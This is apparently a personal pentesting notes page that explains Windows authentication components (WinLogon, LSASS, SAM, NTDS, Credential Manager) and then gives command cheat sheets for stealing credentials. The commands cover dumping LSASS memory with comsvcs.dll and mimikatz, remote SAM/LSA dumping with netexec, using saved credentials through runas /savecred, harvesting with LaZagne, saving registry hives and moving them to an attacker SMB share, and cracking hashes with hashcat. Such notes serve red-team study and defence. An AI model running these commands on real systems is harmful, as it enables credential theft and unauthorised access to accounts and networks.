Authentication - Windows

Reference:

See more about… Authentication Process - Windows

Source: Docs > 9 - Notes > Authentication Process - Windows

1. Key Processes & Architecture

WinLogon (WinLogon.exe)

Role: The “orchestrator.” Intercepts keyboard input (Ctrl+Alt+Del), manages the workstation lock status, and handles password changes.
Workflow: Launches LogonUI -> Collects Creds -> Sends to LSASS.
Legacy Note (GINA): In older Windows (NT/XP), msgina.dll handled this. Replaced by Credential Providers in modern Windows.

LogonUI (LogonUI.exe)

Role: The graphical user interface that asks for the password.
Mechanism: Uses Credential Providers (COM Objects/DLLs) to accept different auth types (Password, PIN, Biometrics).

LSASS (%SystemRoot%\System32\Lsass.exe)

Role: The “Gatekeeper.” Enforces security policy, validates the password against SAM/AD, and writes to the Event Log.
Resources: Microsoft: LSA Architecture

2. Authentication DLLs (The Packages)

These modules live inside LSASS to handle specific tasks.

DLL Name	Function / Description
Lsasrv.dll	The Manager. Enforces policy and chooses the protocol (Negotiate: Kerberos vs NTLM).
Msv1_0.dll	Local / NTLM. Handles non-domain logins and legacy NTLM authentication.
Kerberos.dll	Domain. Handles Kerberos ticket requests and validation.
Samsrv.dll	SAM Interface. Talks to the local SAM database.
Netlogon.dll	Network. Handles the secure channel for network logons.
Ntdsa.dll	AD Interface. Used to create/manage records in the Registry or AD.

3. Credential Storage Locations

Local Users (SAM)

File Path: %SystemRoot%\system32\config\SAM
Registry Mount: HKLM\SAM
Protection: Partially encrypted by SYSKEY (syskey.exe) to prevent offline extraction.
Content: Local user NTLM/LM hashes.

Registry Hive	Description
`HKLM\SAM`	Contains password hashes for local user accounts. These hashes can be extracted and cracked to reveal plaintext passwords.
`HKLM\SYSTEM`	Stores the system boot key, which is used to encrypt the SAM database. This key is required to decrypt the hashes.
`HKLM\SECURITY`	Contains sensitive information used by the Local Security Authority (LSA), including cached domain credentials (DCC2), cleartext passwords, DPAPI keys, and more.

Domain Users (NTDS)

File Path: %SystemRoot%\ntds.dit
Location: Found only on Domain Controllers.
Content: Active Directory database (Users, Groups, Computers, GPOs, Hashes).
Sync: Replicates to all DCs (except Read-Only DCs).

Credential Manager (The Vault)

Role: Stores saved passwords for RDP, Websites, and Network Shares.
Policy.vpol in File Path:

%UserProfile%\AppData\Local\Microsoft\Vault\
%UserProfile%\AppData\Local\Microsoft\Credentials\
%UserProfile%\AppData\Roaming\Microsoft\Vault\
%ProgramData%\Microsoft\Vault\
%SystemRoot%\System32\config\systemprofile\AppData\Roaming\Microsoft\Vault\

Resource: Microsoft: Credential Manager

LSASS

SeDebug: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/debug-programs

# Remotely dump LSA secrets
# NOTE: also requires **SeDebugPrivilege**
netexec smb <TARGET> --local-auth -u <USER> -p <PASSWORD> --lsa
# Remotely dump SAM secrets
netexec smb <TARGET> --local-auth -u <USER> -p <PASSWORD> --sam

NOTE: These require SeDebugPrivilege

Get LSASS memory dump via GUI:

Open Task Manager
Select Details > lsass.exe
Right-Click > “Create Dump File”
Move or transfer the file (usually in %TMP%)

# Get LSASS PID
tasklist /fi "IMAGENAME eq lsass.exe"
Get-Process lsass

# Dump
powershell -command "rundll32.exe C:\windows\system32\comsvcs.dll,MiniDump <PID> $env:TMP\crash.dmp full"

# Parse creds/hashes from dump
pypykatz lsa minidump <DUMP_FILE>
# OR
.\mimikatz.exe
log
sekurlsa::minidump crash.dmp
sekurlsa::logonpasswords

Credential Manager

# Backup Stored Creds
rundll32 keymgr.dll,KRShowKeyMgr

---

# List stored creds
cmdkey /list

# Impersonate
runas /savecred /user:<DOMAIN>\<USER> cmd.exe
runas /savecred /user:<DOMAIN>\<USER> powershell.exe

# Run as Other User
runas /netonly /user:<DOMAIN>\<USER> cmd.exe
runas /netonly /user:<DOMAIN>\<USER> powershell.exe

---

\\tsclient\share\mimikatz.exe
privilege::debug
sekurlsa::credman

Creds Harvesting

Decrypting Firefox or Chrome creds storage
- https://github.com/unode/firefox_decrypt
- https://github.com/ohyicong/decrypt-chrome-passwords

# https://github.com/AlessandroZ/LaZagne
wget -q https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.7/LaZagne.exe -O lazagne.exe

# MODULES: browsers, sysadmin, memory, windows, chats, mails, wifi
.\lazagne.exe all -oA -output creds

---

# WINDOWS: Search for plaintext creds in files
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.git *.ps1 *.yml *.xml

Secrets Dumping (SAM)

https://attack.mitre.org/techniques/T1003/002/

# ATTACKER: create SMB share

# TARGET: save creds hives
reg.exe save HKLM\SAM "%APPDATA%\sam.save"
reg.exe save hklm\SYSTEM "%APPDATA%\system.save"
reg.exe save hklm\SECURITY "%APPDATA%\security.save"

cd %APPDATA%
move *.save \\<ATTACKER_IP\<SHARE>\

# ATTACKER: extract local NT hashes
impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL

# 1000 is for NT hashes
hashcat -m 1000 <HASHES> <WORDLIST>
# 2100 is for PBKDF2 (DCC2 hashes for domain)
hashcat -m 2100 <HASHES> <WORDLIST>

# DPAPI creds
mimikatz.exe
dpapi::chrome /in:"C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect

Hash Defaults of LM or NTLM

Hash Value	Type	Meaning / Context
`aad3b435b51404eeaad3b435b51404ee`	LM	Empty / Disabled. LM is disabled on modern Windows, so this is the placeholder you will see for every user. Ignore it.
`31d6cfe0d16ae931b73c59d7e0c089c0`	NT	Empty String. The user has no password. Common for `Guest` or `Administrator` if not enabled/set.